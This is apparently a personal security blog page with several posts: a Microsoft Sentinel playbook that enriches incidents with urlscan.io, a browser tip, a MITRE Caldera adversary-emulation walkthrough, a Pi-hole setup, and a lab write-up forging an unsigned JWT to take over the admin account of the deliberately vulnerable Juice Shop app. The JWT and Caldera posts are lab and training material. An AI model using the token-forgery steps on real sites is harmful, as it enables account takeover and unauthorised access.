Microsoft Sentinel – Incident Enrichment with urlscan.io

Helping a SOC Analyst get the data they need during an investigation is critical in helping drive down security incident response time. Microsoft Sentinel provides a fantastic place to do incident investigation and response, but there are additional 3rd party services that can be woven into the response lifecycle which benefit the analyst by providing contextual enrichment data. Many of the solutions on the Content Hub or available via the community have the ability to pull in data from external sources to enrich alerts and incidents, but there are additionally very powerful 3rd party services that can be tapped for powerful insights as well.

This blog is going to walkthrough:

  • Signing up for urlscan.io
  • Working with Postman to understand the urlscan.io API
  • Utilizing the Postman Collection to create a custom Logic App Connector
  • Building out a logical flow for utilizing the API for incident enrichment
  • Building a Logic App to enrich a Sentinel Incident

icons

What is urlscan.io?

Per the company’s website (located here: About – urlscan.io)

urlscan.io is a free service to scan and analyse websites. When a URL is submitted to urlscan.io, an automated process will browse to the URL like a regular user and record the activity that this page navigation creates. This includes the domains and IPs contacted, the resources (JavaScript, CSS, etc) requested from those domains, as well as additional information about the page itself. urlscan.io will take a screenshot of the page, record the DOM content, JavaScript global variables, cookies created by the page, and a myriad of other observations. If the site is targeting the users one of the more than 400 brands tracked by urlscan.io, it will be highlighted as potentially malicious in the scan results.

urlscan.io provides 3 main APIs for free. There are commercial options that can be explored on the company’s website for higher quotas and additional functionality.

APIs:

    1. Search: searches urlscan.io to see if the submitted website has already been scanned and then returns those results
      1. Input: URL query string
        1. method: GET
        2. q=domain:whateverdomain.com (domain for which to search)
        3. size=number (number of results to return)
        4. search_after=number (batch retrieval – not used in this post)
      2. Response
        1. JSON response with an array of results (up to ‘size’) sorted most recent to oldest. Response includes URL to a site screenshot as well as a URL to the full JSON result for each result.
    2. Submission: submits a URL to be scanned by urlscan.io. Returns a UUID that can be used to retrieve those specific scan results
      1. Input: POST body
        1. url: url to scan
        2. visiblity: defaults to value in account settings if not specified
        3. tags: array of tags that can be passed (optional)
      2. Response
        1. JSON response with success/fail messages, information about the API, and most importantly the uuid field which can be used with the result API to retrieve the specific results of this scan
    3. Result: accepts the UUID from a previous submission and returns that scan’s specific results
      1. Input:
        1. use the uuid value from the Submission API within the URL path
      2. Response:
        1. The full result set including URLs, certificates, hosting, etc. Of highest interest, URLs to:
          1. Screenshot of the page
          2. Full result set
          3. Initial DOM code

Straight forward – now to sign up!

urlscan.io Account

Signing up is easy and free. Again, there are commercial options so make sure and explore what makes sense for you and your organization. For demo purposes, I am sticking with the free tier.

urlscan-signup

Username & Password…done. Once signed up, you can look at your account and see your quotas:

urlscan-account-info

(Recommend enabling 2FA). A noteworthy item here is the visibility of your scans. You can set the default for your scans and Public (everyone can see), Unlisted (only vetted security researchers w/ Pro licenses can see), or Private (visible only to you). Set this to your preference. More information here: API Documentation – urlscan.io

Now that you have an account, the next step is to generate and save off your API key:

urlscan-api-key

Done! We’re now ready to play with the API.

Postman

When I start playing with an API, my tool of choice is Postman. Postman is available here: Download Postman | Get Started for Free

There are many benefits to using Postman, but a huge one for this scenario is that the Postman collection can be directly imported into Azure Logic Apps Custom Connectors to do a bunch of the heavy lifting for utilizing the API. I created a very simple collection with the 3 main API calls for urlscan.io.

Download here: sentinel/urlscan_io at main · scomurr/sentinel (github.com)

Import the collection into Postman and then set your API key. Set it at the top level so that it is inherited for each of the calls:

postman-set-api-key

Now that the API-Key header is set, let’s play with the calls.

Search:

urlscan-search-noresults

Specifying a domain to the Search API that doesn’t exist, notice no results are returned. The same will be true if the site has never been scanned.

Here, I’m specifying a domain that does exist and has been scanned:

postman-search-microsoft

Excellent! The API key is working and I have results. By specifying size=1, I am returning only the most recent scan. Logic can be wrapped around the timestamp to ensure the scan is fresh.

Moving onto the submission API, I am going to submit my test domain (jhgfdsa.com) to the API to get a fresh scan.

postman-urlscan-submission

Note the uuid. A key thing to note here is that the scan will not be immediately available. It can take a few minutes depending on the complexity of the scan, how busy the urlscan.io services are, how busy the scanned site is, etc. This will have to be factored in when it comes to the automation logic.

After waiting a few minutes, I can take the uuid value over to the Results API and get my scan results:

postman-urlscan-result

Results! We now have a fully functional Postman collection that allows for easy access to the urlscan.io APIs.

Keep Postman open (if you’re following along) – we need the results from each of the API calls for configuring the response options in the next step.

Logic App Custom Connector

Next step is to use the collection (either export, use the one I provided, or create your own) into Azure and create a Logic Apps Custom Connector. This will allow for each of the 3 API calls to be used within a Logic App in response to a Sentinel incident.

Log into Azure and navigate to “Logic Apps Custom Connector” and then click ‘Create’.

 create-logicapps-customconnector

NOTE: the custom connector needs to be in the same region as your logic app. If it is not, the connector will not be available for use within your Logic App.

Now, review and create the custom connector. Once it is created, we can configure by navigating to the resource and then hitting edit.

customconnector-edit

Now, hit the Import button, browse to the Postman collection JSON file, and then hit ‘Update connector’.

customconnector-import-postman

NOTE: the name in the dialog box may or may not switch to match the name of the JSON file. This can be a little misleading as you may think that the browse to the file was not successful.

Once the collection is imported, navigate to the bottom of the screen and then hit ‘Security’ at the bottom to move to the next page. For Security options, the urlscan.io API calls require that the API-Key header is included along with the API key itself. Configure the Security options as such:

logicapps-custom-connector-security

The parameter name needs to be exactly API-Key to match the APIs requirements.

Now, at the bottom move on to ‘Definition’. If the import was successful, you will see the 3 API calls on the left:

customconnector-definitions

At this point, we need to configure the response options for each of our API calls. For each of the calls, move down the screen to the Response section and hit the default response:

customconnector-default-response

Now, hit ‘Import from sample’. This will cause the option to import to fly out from the right.

customconnector-response-flyout

Navigate back to Postman, and for the Submit API copy out the response from the previous call and then paste it into the Body section of the flyout in the screen above. After pasting, hit import.

postman-response-copy

After Import, you should see the elements from the body as payload responses:

customconnector-response-options

Hit ‘Update connector’ up top. Once the update completes, do the same steps for the Search (possible error here – check the next note) and ScanResults Actions on the left hand side.

NOTE: for the result set for Search, the “sort” element in the response JSON payload looks like this:

“sort”: [
     1664215094152,
     “c4d660e5-e55e-456d-9d85-cbc3ea140767”
],

This causes an error because the Azure Portal UI sees the first element in the sort array as an integer and the second element as a string which causes the mismatch error. In order to move past this, simply wrap the integer in double (“1664215094152”) quotes to make both elements be treated as strings.

One more tweak to make the Postman collection work – the Result API needs a tweak. Go to definition and then open the Swagger Editor. Scroll down to ‘/api/v1/result’ around line 120. Two changes, first, set the path to the URI to ‘/api/v1/result/{uuid}:’. Second, add a parameter (line 125/126 or so) so that the swagger file looks like this:

swagger-update

The parameter is:

– {name: uuid, in: path, type: string, required: true}

This parameterizes the late element of the path for the Result API. Hit ‘Update connector’ and the custom connector is complete! Now, it’s a matter of mapping out the logic for responding to an Azure Sentinel incident with URL entities.

Download the custom connector here: sentinel/urlscan_io at main · scomurr/sentinel (github.com)

Response Logic

Looking at the API best practices documented on urlscan.io’s website, the goal is to avoid burning my quota and only call the Submit/Scan and Scan Results APIs when no result is returned or the result is stale. For demo purposes, I am only looking to bring in the latest result as long as the result is < 24 hours old. Here’s a high level diagram of the logic I want to attempt in the Logic App:

logicapp-flow

The goal will be to manually trigger the alert from Sentinel, however, once the logic is baked and a comfort level is established, this could be flagged to automatically run and enrich incidents.

Logic App

In order to create the Logic App for incident response, I am going to navigate to Sentinel –> Automation

sentinel-create-logicapp

This launched the ‘Create playbook’ screen:

create-playbook

Move through to Review and Create. We now have a logic app with the Microsoft Sentinel incident trigger ready to go!

I am not going to walk through the creation and logic of the app, however, the gist of it matches the flow diagram above. Once manually triggered,

  1. the search API will be called
    1. If there is a result, the age of the result will be checked
    2. If the age passes, the result of the search API will be used
  2. otherwise,
    1. Scan will be called
    2. A loop w/ a 1 minute delay between iterations will be used
    3. Each iteration of the loop will call the Results API
    4. Once results are returned, those will be sent to the incident

Note, inside the Logic App Designer, I am able to use the Actions from the Custom Connector:

customconnector-in-logicapp

Completed playbook:

completed-playbook

There’s a lot of additional detail in the playbook that’s hard to capture in the screenshot. Download the sample playbook arm template here: sentinel/urlscan_io at main · scomurr/sentinel (github.com)

NOTE: ARM template will have to be updated to match the subscription and resource group identifiers for target environment.

NOTE: Timestamp logic was not included in this iteration of the logic app. I opted to omit it for the purposes of simplicity and demoing the capabilities of the Custom Connector and the urlscan.io APIs.

Logic App Permission on Log Analytics Workspace

One last step – granting the Logic App the ability to actually update comments within a Sentinel incident. The easiest way to grant the sufficient permissions to the app is within the IAM space for the Log Analytics workspace.

Error: Attempting to execute prior to granting appropriate permissions

“StatusCode”: “Forbidden“,

“ReasonPhrase”: “Forbidden”,

“Content”: “{\”error\”:{\”code\”:\”AuthorizationFailed\”,\”message\”:\”The client ’45f08354-bdb4-4dd7-8547-478cedb154b8′ with object id ’45f08354-bdb4-4dd7-8547-478cedb154b8′ does not have authorization to perform action ‘Microsoft.Securit ` yInsights/incidents/comments/write’ over scope ‘/subscriptions/<subid>/resourceGroups/sentinel-rg/providers/Microsoft.OperationalInsights/workspaces/sentinel-laws/providers/Microsoft.SecurityInsights/incidents/78e6a70b-4884-4f81-bd4e-32bd02496db0/comments/c36bd762-9874-4609-b31c-3e2e17873c7c’ or the scope is invalid. If access was recently granted, please ` refresh your credentials.\”}}”,

To fix this, navigate to Log Analytics Workspaces, select the sentinel workspace in question, navigate to Access control (IAM), and then hit Add

update-sentinel-perms

Hit ‘Add role assignment’ and then select “Contributor” and hit Next

contributor-perms

Managed identity –> Select members –> Logic app –> select the Logic App that requires the permissions:

adding-sentinel-perms

Select and then Review + assign. Done!

Now, to test the enrichment via an incident within Sentinel.

Incident Enrichment

Within Sentinel, I have an incident that came over from Defender for Endpoint. Within the incident, there are several entities, but the one I am concerned with for the purposes of this blog post is the URL:

url-entity

Since I have a URL, I can call my enrichment playbook!

run-playbook

And then select the new playbook to run:

playbook-hit-run

If all works out, the playbook with make calls to urlscan.io and update the incident with comments with the screenshot and report URLs for the scan.

playbook-triggered

Checking the incident after a few seconds and:

search-results

With functional URLs in the comment! Very exciting. This validates the playbook works with a result that can be retrieved via the Search API. Now, need to test with a URL that has not had a scan. At the time of this writing, https://scomurr.com had not been scanned.

I generated an alert in Defender for Endpoint by looking for scomurr.com traffic, and the alert populated into Sentinel via the MDE integration. Launching the playbook…

scomurr-launch-playbook

Waiting just a bit, I checked the execution in Logic Apps:

delay

Which is perfect – the playbook is designed to wait 60 seconds after submitting the URL before calling the Result API to ensure the results are there. The playbook will run the loop four times before timing/failing out. After another 20 seconds, the comments with the results from the API were posted to Sentinel:

submit-result

Done – I now have a Logic App Custom Connector and a Logic App for reaching out to urlscan.io and pulling in results from the API. The results can be posted directly to a comment within a Sentinel incident or alert in order to enrich the data available to an analyst. There is a myriad of great information available via these API calls and I am just using a few tiny elements.

Automation is power. Utilizing Logic Apps to enrich alerts and incidents within Sentinel can help an analyst respond even faster. Happy automating!

Uncategorized

Browser Tip: Pinning Sites as Applications

This is a trick I use pretty heavily to control the amount of tabs I have open and allows me to quickly navigate back to my critical sites without having to sift through the insane amount of tabs I seem to always have/leave open.

Screenshot 2022-08-24 141248

For the sake of argument, let’s say you are a heavy LinkedIn user. One of those little tabs in the screenshot there is LinkedIn, but it can be a pain to locate ESPECIALLY if you have multiple browser stacks open. As I writing this right now, I have Brave browser open with 7 tabs, Chrome open with 4 tabs, and 3 stacks of Edge open with 25 total tabs open – it’s usually much worse. It can be a challenge (and a work disruption) to try and locate the right content. Now, an obvious solution is tab hygiene – close what I am not using. I’ve come to the realization that this is just not going to happen for me. If you can pull it off – kudos. I like this trick instead as it allows me to stay in flow when I am trying to get things done and not have to worry about managing my browser(s).

Here’s an alternative that works with any Chromium based browser (Edge, Chrome, Brave, etc.) and works regardless of OS. In a previous role, I was using G-Suite on a Mac. Leveraging this approach, I was able to pin all of my Google apps to the dock and have them function as separate apps. This approach is platform agnostic.

I’m going to use Edge to pin LinkedIn (since I already have it open).

Screenshot 2022-08-24 142318

3 dots in the upper right corner –> Apps –> Install this site as an app.

Screenshot 2022-08-24 142621

You now have the option to change the icon if wanted and to rename. It is handy to clean the name up right now as this process will name the app the full title of what is currently within the title of the browser tab. In this case, the (11) Feed | part I remove.

Edge additionally gives these options:

Screenshot 2022-08-24 142743

I like the defaults so I hit allow and we’re there! I now have a LinkedIn app within my taskbar, pinned, and it is now super easy for me to navigate back.

Screenshot 2022-08-24 142953

What now appears to be an app with the LinkedIn icon is actually still running within the Edge browser. In fact, the 3 dots at the top of this new “app” allow for easy navigation back to the full browser window if wanted.

Screenshot 2022-08-24 143150

It seems all Chromium based browsers have similar functionality.

Brave & Chrome:

Screenshot 2022-08-24 143419

And then:

Screenshot 2022-08-24 145645

Now, rather than sifting through the mess of tabs I have open across multiple browsers, I can now simply navigate back to the site by using the pinned “app”. In my case, I now have 2 of them since I’ve pinned using Edge and Brave.

Screenshot 2022-08-24 143950

This works with really any site, but I especially like using this if the site is a Progressive Web App. Often, the PWA can be more performant than the thick client for some apps.

Happy surfing!

Productivity

MITRE Caldera – Emulating an Adversary

Perishable threat intelligence – when a new attacker enters the fray or when an existing threat actor changes their tactics, inevitably the various security firms will publish threat intel on these attacks. IOCs expire quickly and grow more stale than the box of cereal your kids raided and failed to reseal in an instant. This does not, however, mean that threat intel should be completely ignored. In fact, it provides value in a few different spaces. In this blog post, I am going to focus on how to use threat intel with MITRE Caldera in order to mimic an adversary. You may want to do for this for a few different purposes. The first purpose might be in the event you are looking at doing a product evaluation. Can endpoint security tool X protect, detect, and help you respond to these attacks? The second way that this can be helpful is in training your SOC and responders. What does the telemetry look like? Do we have all the detections in place necessary to see all the various components across the kill chain in these specific attacks? By leveraging the threat intel in these ways, you can know if you are potentially able to handle these categories of attacks regardless of how attackers morph them. Since the defenders are almost always 1+ steps behind, it is important to utilize the threat intel to help ensure you have the tooling and expertise you need across entire categories within the kill chain.

MITRE Caldera: https://github.com/mitre/caldera

Documentation: https://caldera.readthedocs.io/en/latest/

I HIGHLY recommend running through the content within the Training plugin once you have the product installed. It will give you a solid base in understanding with the product. If you complete the training, you even have the opportunity to turn in a flag to MITRE and they will send you a certificate of completion.


Step 1: Installing the Red Agent

I am going to be using a Windows 10 machine. In order to really see what an adversary would be able to do on the endpoint, I am going to disable all of the Defender oriented protections on the VM including real-time protection as well as any of the mitigating controls that are contained with Attack Surface Reduction (ASR) such as Controlled Folder Access, Exploit Guard, Network Protection, etc. There is a whole host of capabilities built right into Windows 10 that stop most attackers dead in their tracks if the protections are enabled and configured correctly. Windows 10 really is a secure operating system if the full Defender stack is enabled.

Next, I am going to deploy the Sandcat agent (54ndc47) to the machine. Since I do not have a user to phish or anything like that, I just go ahead and deploy the agent by hand to get communication rolling. Caldera does a great job of giving you a PowerShell command customized to your environment if you just fill in the IP of your Caldera machine.

All I have to do is bring the command over to my victim machine, run it, and I will have the ability to attack. Notice, however, the last line of the PowerShell command will actually run the agent in a hidden window. I like to see what is going on so I am going to run the command a little differently so that I can see what is happening with the agent. There are different command line options that can give you verbose output.

As you can see here, I am running the agent in a way that displays verbose output. This will let me know when activities hit the agent which is nice for the purposes of demoing and troubleshooting.

Above is the display of the new agent reporting into the red console within Caldera. Notice that I am running the agent as elevated. I would hope that any kind of phishing would land an attacker within a customer’s environment in the user space and not directly to admin, however, basic mitigations such as removing local admin and deploying tooling such as LAPS is still unfortunately not the norm. If at all possible, implement as many of mitigations from the Securing Privileged Access roadmap located here: https://aka.ms/sparoadmap. Basic account segmentation, credential hygiene and built in security controls available on/within most modern operating systems is enough to stymie the a significant portion of attackers except for the most determined adversaries conducting a targeted attack. Now that we have an agent reporting into Caldera, let us look at constructing a basic adversary.

Step 2: Constructing an Adversary

Within the Caldera Red dashboard, Navigate -> Adversaries. Hit the slider so that it moves from VIEW to ADD

Top center, it is kind of grayed out but find the spot that says “enter a profile name” and do so

Becomes

On the far right, we have the option to link and objective, add an adversary, and/or add ability. For this demo, we are going to focus on MITRE tactics, techniques, and procedures (TPPs) so we are going to add an ability

This brings up a new screen that allows us to browse to the TTPs we want to add to our adversary. The first dropdown list displays a list of the different tactics aligned to the MITRE framework.

I am going to go with discovery. Once I select discovery, techniques are populated in the next drop down that once again align to the MITRE framework

I am going to select T1082 – System Information Discovery. This lights up 12 associated abilities. These are basic endpoint enumeration capabilities that let you snag the version of the OS and other basic system information from the endpoint. I am going to add a few of these to my adversary. When I select one of these, I can view the code and the associated information for each of the supported platforms. This is really nice as it shows how these abilities are constructed which can lend itself nicely to constructing your own custom TPPs down the road.

Down at the very bottom, hit Add to Adversary. Now, the new adversary looks like this:

I am going to add a few more for discovering additional system information NOTE – since I am going after a windows machine, I need to make sure whatever ability I select actually has Windows as an option or I would need to potentially add my own code. For example, if I select List OS Information, I can look at the bottom and see that there is code for Darwin (Mac) and Linux – but there is no Windows! I am thinking I could easily create a new ability and add an executor for this that would run the systeminfo command on the endpoint.

  • Reset button to clear all options
  • Generate new id (sets the GUID)
  • Name = Custom – List OS Information
  • Description = Identity System Info
  • Tactic = discovery
  • Technique ID= T1082
  • Technique = System Information Discovery
  • Add executor
  • Platform = Windows
  • Executor = psh
  • Command = systeminfo
  • Timeout = 60

Leave the rest. Save and then add it to our adversary.

Notice that this activity actually now covers all 3 platforms

At this point, you can add as many techniques that align to your threat intel into your new custom adversary. I am not going to add any more for demo purposes and instead I am going to go ahead and save my adversary

Now, I can run an operation against my agent that I had previously deployed. Let us see if I get results! Step 3: Run an Operation Navigate -> Operations Change view to Add

  • Name = Customer Adversary Test Operation
  • Group = red (in my environment there is only 1 group and the agent is assigned to this group)
  • Adversary = Blog Post Demo Adversary

Leave the rest and hit start. This should attack my agent with basic recon TTPs. After I hit start, I have to wait for the agent to beacon but then I see the agent starting to run the activities I have associated with the operation

Troubleshooting – if your activities do not run (or they just are not displayed), you can download the report and it will potentially tell you which TPPs are not executed and even potentially why. For example, on first pass with this blog post I set the executor for the custom activity to cmd and it failed to load and run. I did not dig into the details (suspect it required cmd line param format for the executor) but I switched it to psh and now it runs just fine.

And I can view the details by clicking the star icon to the right

Cool stuff! With this, I can take perishable threat intel and use the Caldera tool to simulate the types of activities these actors are executing in the wild. This approach lets me test my tooling to ensure I have visibility and potentially protection and control in these spaces within my environment. I can train my SOC to look for these TPPs and the activities associated with various threat actors and campaigns. This can be very powerful if used in the right way.

MITRE, OffSec, Security

Pi-hole – Life Changer? Maybe…

The Internet seems to run on advertising – and that is fair. Companies and individuals need to find a way to monetize their products and data without hiding everything behind paywalls. With that being said, there are plenty of sites and services with ill intent when it comes to harvesting data, counting clicks, analyzing and attributing browsing habits, etc. As a consumer, a daily user of the Internet, and one who actually relies on the Internet for my livelihood, I feel it is very important to protect myself and my family’s online activities.

Enter Pi-hole

https://pi-hole.net/

What is Pi-hole? It is an application that runs on Linux (which could be running on a Raspberry Pi) that acts as a DNS sinkhole. When traffic from your network is looking to route to an unwanted domain on the Interwebs, Pi-hole simply refuses to respond with an IP address of the destination. This is a pretty slick way to head off adware and other dynamic content that gets rendered in a lot of sites. For me, I absolutely despise when I browse to a site, start reading and then the whole page rearranges/shifts because an ad pops.

I was surprised at how easy this was to set up. First, a key point: Pi-hole does NOT require that you purchase a(nother) Raspberry Pi – it can run in a few different ways. First, it can run as a Docker container (awesome) or you can simply install it on the various operating systems that are supported. I have a beefy (if old) Hyper-V server running in my basement, so, for my purposes, I chose Ubuntu 18.04 – mostly because I already have a VM image created. I fired up a new copy of the image, sudo update && sudo upgrade and then away we go.

Install

https://github.com/pi-hole/pi-hole/#one-step-automated-install

I read through the install and chose to install this with the One-Step Automated Install. It is a VM – if something goes wrong, I can revert to a new image since nothing else is happening on this machine anyway. The One-Step install went almost perfectly. It was fast and I only hit one minor snag post install – DNS resolution on the machine was pointed to 127.0.0.53 in the /etc/resolv.conf file. I changed the file so that DNS is now resolved via my router (forwarded to ISP).

The next step was to set the Pi-hole admin password. From my reading it sounds like I might have missed a password getting set during the install and being displayed the screen. No biggie, the password can be set by a machine admin:

The last step to configure Pi-hole was to update Gravity. I am not 100% sure this is a required step in order to get the Pi-hole working initially, however, things started working almost instantly (and awesomely) immediately after I ran the update. Basically, Gravity takes all your block lists, consolidates them, and then that’s the list that is then used to sink unwanted requests:

The only thing left to do at this point is to change the DNS settings in my environment so that my machines all start using the Pi-hole for DNS. For me, this actually meant temporarily cutting over to the built in DHCP server that the Pi-hole provides for the purposes of this blog post.

Note – disable any other DHCP services running on the network.

24 hours later

Wow, what a difference.

Sites that are riddled with ads and out of control JS that cause me to want to hulk smash the keyboard because the content moves after I have started reading…are no longer misbehaving. Games on my cell phone…playable! What a massive improvement in the user experience. And I now have the ability to pull in additional lists or purposefully block sites and services in my environment by simply adding them to the list. I already love it, and this is going to be a very handy tool to have for testing purposes.

Automation, Security, Web Attacks

Practicing JWT Attacks Against Juice-Shop

I love attending the sessions put on by Black Hills Information Security when I can. Last week, the session was on JWT token attacks which I found very interesting. I wanted to see if I could mimic part of the demonstrated attack, reproduce and then leverage that attack into elevated access on a site. The BHIS session for JWT attacks on the day of 6/18/2020 can be found here: https://www.youtube.com/watch?v=muYmiEtPL8U&t=2490s

For this lab, I downloaded Juice Shop which is intentionally vulnerable to many of the top OWASP attacks. Once I had the app up and running, I explored the app some to enumerate users. In the session we didn’t get to see where the admin user was exposed – turns out this was super easy to find. After poking around in the site I decided to try and attack a password change for the admin account to see if I could muster a complete account takeover.

Step 1: Install Juice-Shop

I already had an Ubuntu 18.04 LTS machine running in the lab, so I just wanted to add the app here. I tried the NodeJS and NPM route first, but I ran into some snags and I did not want to invest a ton of time troubleshooting. I decided to go the Docker route and I was able to get this working on the first try.

Juice-Shop: https://github.com/bkimminich/juice-shop#docker-container

Docker installation directions: https://docs.docker.com/engine/install/ubuntu/

I followed the documented steps verbatim:

And I was able to browse the site:

 

Step 2: Recon

There is a ton to explore on this site. For the purposes of this post, the only necessary recon is to open the Apple Juice product, look at the product review and note the username of the person that left the review:


admin@juice-sh.op seems like a “juicy” target (pun intended).

Ok, now onto trying to exploit a JWT token vulnerability…

Step 3: Identify Where/What to Attack

    1. I need an account. If I have an account, I can look at how the JWT tokens are constructed and then I can use that to try and craft a new token as my victim user. I went to login – created a new account named hack@hack.com w/ a password of P@ssw0rd!

    2. I then logged in with the newly created credentials:

    3. I took a look at all of the traffic in the Burp proxy log and notice calls to the /rest/user/whoami endpoint with my JWT token:

    4. The tokens are the same in the Authorization header as well as in the cookie. I chose the bottom /rest/user/whoami GET and Send to Repeater
    5. Now I need to learn if I need to attack the Authorization Bearer token, the token in the cookie or both
      1. I added a letter to auth header (basically break it) – no change on send
      2. I added a letter to the cookie and it breaks – this is the one that matters

Before:

After:

Step 4: Craft the JWT Attack Token

  1. This is a signed JWT token – I can tell because it’s <base64URLencoded-header>.< base64URLencoded -payload>.< base64URLencoded -signature> – 3 base64urlencoded strings separated by periods:

  2. I copied the header into Decoder, decode as Base64, change “RS265” to “None” and then encode as base64. The new string is my new header. I paste this into a document off to the side for later use

     

    ** NOTE – the “=” sign will break the header. These need to dropped when copying and pasting!

  3. Next, I grabbed the payload and dropped that into Decoder, modified the email address and then reencoded as base64:

    And change it to this and then encode it as base64

  4. I copied the new payload and then pasted the new header and payload into repeater. Drop the signature (since we now have “none” in the header) and hit send:

    No luck – this is where I had to play with the headers a bit to get this to consistently work. In order to get the return I wanted I ended up removing headers until I got the result.

    Modified request (missing some headers – most notably the bearer token):

    Result:

Success! With that, I doubt that the id of the admin user is 18 (this is the id for my hack@hack.com account I created). Most likely, admin is going to be an id of 1 so I changed that in the token, encode and resend. Result:

Step 5: JWT Attack

  1. I now have a JWT token that is accept by the /rest/user/whoami API. With that, I need to see if other parts of the application will accept the token and chose to attack the password change functionality. I went into password reset on my account to change the password:

    And change the password to “password1”:

  2. Looking at this traffic in Burp:

  3. I simply take and replace the Authorization token with the newly crafted JWT and replace the entire cookie in this new request from the previous Repeater request:

    I get a 200 back and the password is shown there within the returned payload. Turns out this is the MD5 of the password I did in fact just set. Now, can I login with the creds?

  4. Success!

I was able to change the password for the admin@juice-sh.op account and log into the app with the new credentials!

Key takeaways:

  1. Base64url encoding for the headers
    1. Drop the trailing “=” or the header will break
  2. Play with the headers until you get a result you like

Good stuff!

Security, Web Attacks